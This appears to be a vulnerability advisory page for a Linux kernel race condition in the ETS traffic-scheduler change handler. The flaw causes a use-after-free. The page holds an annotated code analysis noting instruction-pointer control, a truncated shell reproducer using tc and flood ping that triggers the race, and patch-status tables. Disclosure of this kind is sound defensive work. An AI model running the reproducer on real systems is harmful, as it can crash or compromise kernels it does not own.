CVE-2025-71066

EUVD-2026-2266

13.01.2026, 16:16

In the Linux kernel, the following vulnerability has been resolved:

net/sched: ets: Always remove class from active list before deleting in ets_qdisc_change

zdi-disclosures@trendmicro.com says:

The vulnerability is a race condition between `ets_qdisc_dequeue` and
`ets_qdisc_change`.  It leads to UAF on `struct Qdisc` object.
Attacker requires the capability to create new user and network namespace
in order to trigger the bug.
See my additional commentary at the end of the analysis.

Analysis:

static int ets_qdisc_change(struct Qdisc *sch, struct nlattr *opt,
                          struct netlink_ext_ack *extack)
{
...

      // (1) this lock is preventing .change handler (`ets_qdisc_change`)
      //to race with .dequeue handler (`ets_qdisc_dequeue`)
      sch_tree_lock(sch);

      for (i = nbands; i < oldbands; i++) {
              if (i >= q->nstrict && q->classes[i].qdisc->q.qlen)
                      list_del_init(&q->classes[i].alist);
              qdisc_purge_queue(q->classes[i].qdisc);
      }

      WRITE_ONCE(q->nbands, nbands);
      for (i = nstrict; i < q->nstrict; i++) {
              if (q->classes[i].qdisc->q.qlen) {
		      // (2) the class is added to the q->active
                      list_add_tail(&q->classes[i].alist, &q->active);
                      q->classes[i].deficit = quanta[i];
              }
      }
      WRITE_ONCE(q->nstrict, nstrict);
      memcpy(q->prio2band, priomap, sizeof(priomap));

      for (i = 0; i < q->nbands; i++)
              WRITE_ONCE(q->classes[i].quantum, quanta[i]);

      for (i = oldbands; i < q->nbands; i++) {
              q->classes[i].qdisc = queues[i];
              if (q->classes[i].qdisc != &noop_qdisc)
                      qdisc_hash_add(q->classes[i].qdisc, true);
      }

      // (3) the qdisc is unlocked, now dequeue can be called in parallel
      // to the rest of .change handler
      sch_tree_unlock(sch);

      ets_offload_change(sch);
      for (i = q->nbands; i < oldbands; i++) {
	      // (4) we're reducing the refcount for our class's qdisc and
	      //  freeing it
              qdisc_put(q->classes[i].qdisc);
	      // (5) If we call .dequeue between (4) and (5), we will have
	      // a strong UAF and we can control RIP
              q->classes[i].qdisc = NULL;
              WRITE_ONCE(q->classes[i].quantum, 0);
              q->classes[i].deficit = 0;
              gnet_stats_basic_sync_init(&q->classes[i].bstats);
              memset(&q->classes[i].qstats, 0, sizeof(q->classes[i].qstats));
      }
      return 0;
}

Comment:
This happens because some of the classes have their qdiscs assigned to
NULL, but remain in the active list. This commit fixes this issue by always
removing the class from the active list before deleting and freeing its
associated qdisc

Reproducer Steps
(trimmed version of what was sent by zdi-disclosures@trendmicro.com)

```
DEV="${DEV:-lo}"
ROOT_HANDLE="${ROOT_HANDLE:-1:}"
BAND2_HANDLE="${BAND2_HANDLE:-20:}"   # child under 1:2
PING_BYTES="${PING_BYTES:-48}"
PING_COUNT="${PING_COUNT:-200000}"
PING_DST="${PING_DST:-127.0.0.1}"

SLOW_TBF_RATE="${SLOW_TBF_RATE:-8bit}"
SLOW_TBF_BURST="${SLOW_TBF_BURST:-100b}"
SLOW_TBF_LAT="${SLOW_TBF_LAT:-1s}"

cleanup() {
  tc qdisc del dev "$DEV" root 2>/dev/null
}
trap cleanup EXIT

ip link set "$DEV" up

tc qdisc del dev "$DEV" root 2>/dev/null || true

tc qdisc add dev "$DEV" root handle "$ROOT_HANDLE" ets bands 2 strict 2

tc qdisc add dev "$DEV" parent 1:2 handle "$BAND2_HANDLE" \
  tbf rate "$SLOW_TBF_RATE" burst "$SLOW_TBF_BURST" latency "$SLOW_TBF_LAT"

tc filter add dev "$DEV" parent 1: protocol all prio 1 u32 match u32 0 0 flowid 1:2
tc -s qdisc ls dev $DEV

ping -I "$DEV" -f -c "$PING_COUNT" -s "$PING_BYTES" -W 0.001 "$PING_DST" \
  >/dev/null 2>&1 &
tc qdisc change dev "$DEV" root handle "$ROOT_HANDLE" ets bands 2 strict 0
tc qdisc change dev "$DEV" root handle "$ROOT_HANDLE" ets bands 2 strict 2
tc -s qdisc ls dev $DEV
tc qdisc del dev "$DEV" parent 
---truncated---

Race Condition

Provider	Type	Base Score	Atk. Vector	Atk. Complexity	Priv. Required	Vector
NIST	Primary	7.5 HIGH	LOCAL	HIGH	HIGH	CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

Awaiting analysis

This vulnerability is currently awaiting analysis.

Base Score

CVSS 3.x

EPSS Score

Percentile: 4%

Debian Releases

Debian Product

Codename

linux

bookworm	6.1.170-3 fixed
bookworm (security)	6.1.172-1 fixed
bullseye	vulnerable
bullseye (security)	5.10.251-5 fixed
forky	7.0.9-1 fixed
sid	7.0.9-1 fixed
trixie	6.12.86-1 fixed
trixie (security)	6.12.90-1 fixed

linux-6.1

bullseye (security)

6.1.172-1~deb11u1

fixed

openSUSE / SLES Releases

openSUSE Product

Release

cluster-md-kmp-default

suse enterprise server 15 SP5	5.14.21-150500.55.141.1 fixed
suse enterprise server 15 SP6	6.4.0-150600.23.92.1 fixed

dlm-kmp-default

suse enterprise server 15 SP5	5.14.21-150500.55.141.1 fixed
suse enterprise server 15 SP6	6.4.0-150600.23.92.1 fixed

gfs2-kmp-default

suse enterprise server 15 SP5	5.14.21-150500.55.141.1 fixed
suse enterprise server 15 SP6	6.4.0-150600.23.92.1 fixed

kernel-64kb

suse enterprise desktop 15 SP7	6.4.0-150700.53.34.1 fixed
suse enterprise sap 15 SP7	6.4.0-150700.53.34.1 fixed
suse enterprise server 15 SP4	5.14.21-150400.24.197.1 fixed
suse enterprise server 15 SP5	5.14.21-150500.55.141.1 fixed
suse enterprise server 15 SP6	6.4.0-150600.23.92.1 fixed
suse enterprise server 15 SP7	6.4.0-150700.53.34.1 fixed

kernel-azure

suse enterprise sap 15 SP7	6.4.0-150700.53.34.1 fixed
suse enterprise server 15 SP7	6.4.0-150700.53.34.1 fixed

kernel-default

suse enterprise server 15 SP4	5.14.21-150400.24.197.1 fixed
suse enterprise server 15 SP5	5.14.21-150500.55.141.1 fixed
suse enterprise server 15 SP6	6.4.0-150600.23.92.1 fixed

kernel-default-base

suse enterprise desktop 15 SP7	6.4.0-150700.53.34.1.150700.17.23.1 fixed
suse enterprise sap 15 SP7	6.4.0-150700.53.34.1.150700.17.23.1 fixed
suse enterprise server 15 SP4	5.14.21-150400.24.197.1.150400.24.100.1 fixed
suse enterprise server 15 SP5	5.14.21-150500.55.141.1.150500.6.69.2 fixed
suse enterprise server 15 SP6	6.4.0-150600.23.92.1.150600.12.42.2 fixed
suse enterprise server 15 SP7	6.4.0-150700.53.34.1.150700.17.23.1 fixed

kernel-docs

suse enterprise desktop 15 SP7	6.4.0-150700.53.34.1 fixed
suse enterprise sap 15 SP7	6.4.0-150700.53.34.1 fixed
suse enterprise server 15 SP4	5.14.21-150400.24.197.1 fixed
suse enterprise server 15 SP5	5.14.21-150500.55.141.1 fixed
suse enterprise server 15 SP6	6.4.0-150600.23.92.1 fixed
suse enterprise server 15 SP7	6.4.0-150700.53.34.1 fixed

kernel-macros

suse enterprise desktop 15 SP7	6.4.0-150700.53.34.1 fixed
suse enterprise sap 15 SP7	6.4.0-150700.53.34.1 fixed
suse enterprise server 15 SP4	5.14.21-150400.24.197.1 fixed
suse enterprise server 15 SP5	5.14.21-150500.55.141.1 fixed
suse enterprise server 15 SP6	6.4.0-150600.23.92.1 fixed
suse enterprise server 15 SP7	6.4.0-150700.53.34.1 fixed

kernel-obs-build

suse enterprise desktop 15 SP7	6.4.0-150700.53.34.1 fixed
suse enterprise sap 15 SP7	6.4.0-150700.53.34.1 fixed
suse enterprise server 15 SP4	5.14.21-150400.24.197.1 fixed
suse enterprise server 15 SP5	5.14.21-150500.55.141.1 fixed
suse enterprise server 15 SP6	6.4.0-150600.23.92.1 fixed
suse enterprise server 15 SP7	6.4.0-150700.53.34.1 fixed

kernel-source

suse enterprise desktop 15 SP7	6.4.0-150700.53.34.1 fixed
suse enterprise sap 15 SP7	6.4.0-150700.53.34.1 fixed
suse enterprise server 15 SP4	5.14.21-150400.24.197.1 fixed
suse enterprise server 15 SP5	5.14.21-150500.55.141.1 fixed
suse enterprise server 15 SP6	6.4.0-150600.23.92.1 fixed
suse enterprise server 15 SP7	6.4.0-150700.53.34.1 fixed

kernel-source-azure

suse enterprise sap 15 SP7	6.4.0-150700.20.27.1 fixed
suse enterprise server 15 SP7	6.4.0-150700.20.27.1 fixed

kernel-syms

suse enterprise desktop 15 SP7	6.4.0-150700.53.34.1 fixed
suse enterprise sap 15 SP7	6.4.0-150700.53.34.1 fixed
suse enterprise server 15 SP4	5.14.21-150400.24.197.1 fixed
suse enterprise server 15 SP5	5.14.21-150500.55.141.1 fixed
suse enterprise server 15 SP6	6.4.0-150600.23.92.1 fixed
suse enterprise server 15 SP7	6.4.0-150700.53.34.1 fixed

kernel-syms-azure

suse enterprise sap 15 SP7	6.4.0-150700.20.27.1 fixed
suse enterprise server 15 SP7	6.4.0-150700.20.27.1 fixed

kernel-zfcpdump

suse enterprise desktop 15 SP7	6.4.0-150700.53.34.1 fixed
suse enterprise sap 15 SP7	6.4.0-150700.53.34.1 fixed
suse enterprise server 15 SP4	5.14.21-150400.24.197.1 fixed
suse enterprise server 15 SP5	5.14.21-150500.55.141.1 fixed
suse enterprise server 15 SP6	6.4.0-150600.23.92.1 fixed
suse enterprise server 15 SP7	6.4.0-150700.53.34.1 fixed

ocfs2-kmp-default

suse enterprise server 15 SP5	5.14.21-150500.55.141.1 fixed
suse enterprise server 15 SP6	6.4.0-150600.23.92.1 fixed

reiserfs-kmp-default

suse enterprise server 15 SP4	5.14.21-150400.24.197.1 fixed
suse enterprise server 15 SP5	5.14.21-150500.55.141.1 fixed
suse enterprise server 15 SP6	6.4.0-150600.23.92.1 fixed

Common Weakness Enumeration

CWE-362 - Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')
The program contains a code sequence that can run concurrently with other code, and the code sequence requires temporary, exclusive access to a shared resource, but a timing window exists in which the shared resource can be modified by another code sequence that is operating concurrently.

References

https://git.kernel.org/stable/c/062d5d544e564473450d72e6af83077c2b2ff7c3

https://git.kernel.org/stable/c/06bfb66a7c8b45e3fed01351a4b087410ae5ef39

https://git.kernel.org/stable/c/45466141da3c98a0c5fa88be0bc14b4b6a4bd75c

https://git.kernel.org/stable/c/9987cda315c08f63a02423fa2f9a1f6602c861a0

https://git.kernel.org/stable/c/a75d617a4ef08682f5cfaadc01d5141c87e019c9

https://git.kernel.org/stable/c/c7f6e7cc14df72b997258216e99d897d2df0dbbd

https://git.kernel.org/stable/c/ce052b9402e461a9aded599f5b47e76bc727f7de